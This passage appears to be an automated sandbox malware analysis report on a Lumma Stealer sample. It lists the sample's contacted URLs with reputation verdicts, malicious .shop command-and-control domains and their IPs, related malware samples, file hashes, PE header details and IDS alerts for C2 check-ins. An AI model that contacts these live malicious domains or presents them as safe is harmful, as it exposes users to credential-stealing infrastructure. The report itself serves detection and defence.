                          • Avira URL Cloud: malware
                          unknown
                          https://community.akamai.steamstatic.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.gstatic.cn/recaptcha/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://recaptcha.net/recaptcha/;RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://offensivedzvju.shop/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://performenj.shop/apiGRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.youtube.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://medal.tvRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://broadcast.st.dl.eccdnx.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reinforcenh.shop/RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://steamcommunity.com/KRegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reinforcenh.shop/api2RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://s.ytimg.com;RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://login.steampowered.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://steam.tv/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://drawzhotdog.shop/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://performenj.shop/RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://vozmeatillu.shop/YRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://store.steampowered.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://sketchfab.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://lv.queniujq.cnRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          https://www.youtube.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
http://127.0.0.1:27060 | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
https://stogeneratmns.shop/apiD | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | malicious: true | Avira URL Cloud: malware | reputation: unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://performenj.shop/G | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | malicious: true | Avira URL Cloud: malware | reputation: unknown
https://www.google.com/recaptcha/ | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://checkout.steampowered.com/ | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
https://help.steampowered.com/ | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
https://api.steampowered.com/ | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://store.steampowered.com/account/cookiepreferences/ | source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
https://steamcommunity.com/ | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://store.steampowered.com/; | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
https://steamcommunity.com/x | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://steamcommunity.com/profiles/76561199724331900/badges | source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | malicious: true | URL Reputation: malware | reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.77.130 | reinforcenh.shop | United States | 13335 | CLOUDFLARENETUS | true
104.21.4.136 | gutterydhowi.shop | United States | 13335 | CLOUDFLARENETUS | true
172.67.189.2 | performenj.shop | United States | 13335 | CLOUDFLARENETUS | true
188.114.97.3 | fragnantbui.shop | European Union | 13335 | CLOUDFLARENETUS | true
188.114.96.3 | offensivedzvju.shop | European Union | 13335 | CLOUDFLARENETUS | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
104.21.58.182 | drawzhotdog.shop | United States | 13335 | CLOUDFLARENETUS | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519281
                          Start date and time:2024-09-26 09:51:12 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 21s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:a7HdB2dU5P.exe
                          renamed because original name is a hash value
                          Original Sample Name:ec5818decca5d6703e23c9db8a772997.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@4/2@11/7
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 13
                          • Number of non-executed functions: 80
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 52.165.165.26
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: a7HdB2dU5P.exe
Time | Type | Description
03:52:06 | API Interceptor | 5x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.77.130 | Notepad3_v6.23.203.2.exe | malicious | Amadey, GO Backdoor | downloaddining3.com/h9fmdW7/index.php
104.21.77.130 | am.exe | malicious | Amadey | downloaddining3.com/h9fmdW7/index.php
104.21.77.130 | am.exe | malicious | Amadey | downloaddining3.com/h9fmdW7/index.php
104.21.4.136 | file.exe | malicious | LummaC, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Vidar |
104.21.4.136 | file.exe | malicious | LummaC |
104.21.4.136 | file.exe | malicious | LummaC, Vidar |
172.67.189.2 | file.exe | malicious | LummaC, Vidar |
172.67.189.2 | file.exe | malicious | LummaC, Vidar |
172.67.189.2 | file.exe | malicious | LummaC, Stealc, Vidar |
172.67.189.2 | file.exe | malicious | LummaC, Vidar |
172.67.189.2 | Suselx1.exe | malicious | LummaC |
172.67.189.2 | gkqg90.ps1 | malicious | LummaC |
172.67.189.2 | Res.ps1 | malicious | LummaC |
172.67.189.2 | file.exe | malicious | LummaC, Stealc, Vidar |
172.67.189.2 | file.exe | malicious | LummaC, Stealc, Vidar |
172.67.189.2 | SecuriteInfo.com.Win32.PWSX-gen.716.1862.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
gutterydhowi.shop | file.exe | malicious | LummaC, Vidar | 172.67.132.32
gutterydhowi.shop | bYQ9uTqLzz.exe | malicious | LummaC | 172.67.132.32
gutterydhowi.shop | file.exe | malicious | LummaC, Vidar | 172.67.132.32
gutterydhowi.shop | file.exe | malicious | LummaC, Vidar | 104.21.4.136
gutterydhowi.shop | file.exe | malicious | LummaC, Stealc, Vidar | 172.67.132.32
gutterydhowi.shop | file.exe | malicious | LummaC, Vidar | 172.67.132.32
gutterydhowi.shop | ACeTKO93e9.exe | malicious | LummaC | 172.67.132.32
gutterydhowi.shop | file.exe | malicious | LummaC, Stealc, Vidar | 104.21.4.136
gutterydhowi.shop | file.exe | malicious | LummaC, Stealc, Vidar | 104.21.4.136
gutterydhowi.shop | file.exe | malicious | LummaC, Stealc, Vidar | 104.21.4.136
performenj.shop | file.exe | malicious | LummaC, Vidar | 104.21.51.224
performenj.shop | HHXyi02DYl.exe | malicious | LummaC | 104.21.51.224
performenj.shop | bYQ9uTqLzz.exe | malicious | LummaC | 104.21.51.224
performenj.shop | HHXyi02DYl.exe | malicious | Unknown | 104.21.51.224
performenj.shop | SecuriteInfo.com.Win64.Malware-gen.15701.20735.exe | malicious | LummaC, Go Injector, LummaC Stealer, MicroClip | 104.21.51.224
performenj.shop | SecuriteInfo.com.Win64.Evo-gen.13360.8133.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.51.224
performenj.shop | file.exe | malicious | LummaC, Vidar | 172.67.189.2
performenj.shop | file.exe | malicious | LummaC, Vidar | 172.67.189.2
performenj.shop | file.exe | malicious | LummaC, Stealc, Vidar | 172.67.189.2
performenj.shop | file.exe | malicious | LummaC, Vidar | 172.67.189.2
fragnantbui.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
fragnantbui.shop | bYQ9uTqLzz.exe | malicious | LummaC | 188.114.96.3
fragnantbui.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
fragnantbui.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
fragnantbui.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
fragnantbui.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
fragnantbui.shop | ACeTKO93e9.exe | malicious | LummaC | 188.114.97.3
fragnantbui.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
fragnantbui.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.97.3
fragnantbui.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | iq2HxA0SLw.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.37.97
CLOUDFLARENETUS | Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | malicious | AgentTesla, RedLine | 104.26.13.205
CLOUDFLARENETUS | QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | 450230549.exe | malicious | AgentTesla | 162.159.134.233
CLOUDFLARENETUS | 64.exe | malicious | Unknown | 162.159.61.3
CLOUDFLARENETUS | 450230549.exe | malicious | Unknown | 162.159.134.233
CLOUDFLARENETUS | PO-100001499.exe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | ADNOC requesting RFQ.exe | malicious | FormBook | 104.21.64.108
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | iq2HxA0SLw.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | https://tiktoksc.tv/wap | malicious | Unknown | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | https://xtrafree.x10.mx/ | malicious | Unknown | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | PersonalizedOffer.exe | malicious | UltraVNC | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | PersonalizedOffer.exe | malicious | UltraVNC | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Vidar | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | HHXyi02DYl.exe | malicious | LummaC | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | bYQ9uTqLzz.exe | malicious | LummaC | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
a0e9f5d64349fb13191bc781f81f42e1 | LcDQjpdIiU.exe | malicious | LummaC | 104.21.77.130, 104.21.4.136, 172.67.189.2, 188.114.97.3, 188.114.96.3, 104.102.49.254, 104.21.58.182
                                                                No context
                                                                Process:C:\Users\user\Desktop\a7HdB2dU5P.exe
                                                                File Type:CSV text
                                                                Category:modified
                                                                Size (bytes):425
Entropy (8bit): 5.353683843266035
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5: 859802284B12C59DDBB85B0AC64C08F0
SHA1: 4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256: FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512: 8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

Process: C:\Users\user\Desktop\a7HdB2dU5P.exe
File Type: ASCII text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 33
Entropy (8bit): 2.2845972159140855
Encrypted: false
SSDEEP: 3:i6vvRyMivvRya:iKvHivD
MD5: 45B4C82B8041BF0F9CCED0D6A18D151A
SHA1: B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
SHA-256: 7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
SHA-512: B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
Malicious: false
Reputation: low
Preview: 0..1..2..3..4..0..1..2..3..4.....

File type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.9894730772519456
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: a7HdB2dU5P.exe
File size: 374'784 bytes
MD5: ec5818decca5d6703e23c9db8a772997
SHA1: daeca7f333cedb461891a3fa4be6a857df452b59
SHA256: 2da667c881a6b5f4b773c932bcbb6825fda5a85a38bfb51e06921cb88c353f3b
SHA512: 12205f23f622518eddde5c9ecc5168929a421ff1a0442dca23104723a5ad7edfd1e84bcbba4afe03fe20823cb0d39e4fdf7fae716b43cd1cec244bb12d60c254
SSDEEP: 6144:VX7iHuLVysIuU1dHpxx7VOEe9hTuubkP9vMV8DGtywI/ZM9M6vrNaIr6NKHQ3iFE:FZVyruU1BxcElnP9kV82Z+oRXQiFP
TLSH: 5A842364F21A8765C764947AEE86962CCDF3B93A2A5F90076CE47E098D0DD3B1347B30
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3.f................................. ........@.. ....................... ............`................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x45ccee
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F43305 [Wed Sep 25 15:57:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5cc94 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5e000 | 0x5b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x60000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x5cb5c | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x5acf4 | 0x5ae00 | c03cbc644eb253acf1af646f29cebfd3 | False | 0.9938477905777167 | data | 7.995621110986315 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x5e000 | 0x5b8 | 0x600 | e0c57c891752f78d44441c65570fe51e | False | 0.4381510416666667 | data | 4.119761219082767 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x60000 | 0xc | 0x200 | 93175a635d4731115c9b1e1c282e8f9e | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x5e0a0 | 0x324 | data | | | 0.4552238805970149
RT_MANIFEST | 0x5e3c8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T09:52:06.643740+0200 | 2056048 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop) | 1 | 192.168.2.4 | 63148 | 1.1.1.1 | 53 | UDP
2024-09-26T09:52:06.724512+0200 | 2056164 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) | 1 | 192.168.2.4 | 60602 | 1.1.1.1 | 53 | UDP
2024-09-26T09:52:07.234560+0200 | 2056165 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) | 1 | 192.168.2.4 | 58440 | 104.21.4.136 | 443 | TCP
2024-09-26T09:52:07.786343+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58440 | 104.21.4.136 | 443 | TCP
2024-09-26T09:52:07.786343+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58440 | 104.21.4.136 | 443 | TCP
2024-09-26T09:52:07.792672+0200 | 2056162 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) | 1 | 192.168.2.4 | 52810 | 1.1.1.1 | 53 | UDP
2024-09-26T09:52:08.270066+0200 | 2056163 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) | 1 | 192.168.2.4 | 58441 | 188.114.97.3 | 443 | TCP
2024-09-26T09:52:08.769507+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58441 | 188.114.97.3 | 443 | TCP
2024-09-26T09:52:08.769507+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58441 | 188.114.97.3 | 443 | TCP
2024-09-26T09:52:08.773382+0200 | 2056160 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) | 1 | 192.168.2.4 | 60842 | 1.1.1.1 | 53 | UDP
2024-09-26T09:52:09.259590+0200 | 2056161 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) | 1 | 192.168.2.4 | 58442 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:09.681716+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58442 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:09.681716+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58442 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:09.685196+0200 | 2056158 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) | 1 | 192.168.2.4 | 55892 | 1.1.1.1 | 53 | UDP
2024-09-26T09:52:10.172268+0200 | 2056159 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) | 1 | 192.168.2.4 | 58443 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:10.618108+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58443 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:10.618108+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58443 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:10.620207+0200 | 2056156 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) | 1 | 192.168.2.4 | 64598 | 1.1.1.1 | 53 | UDP
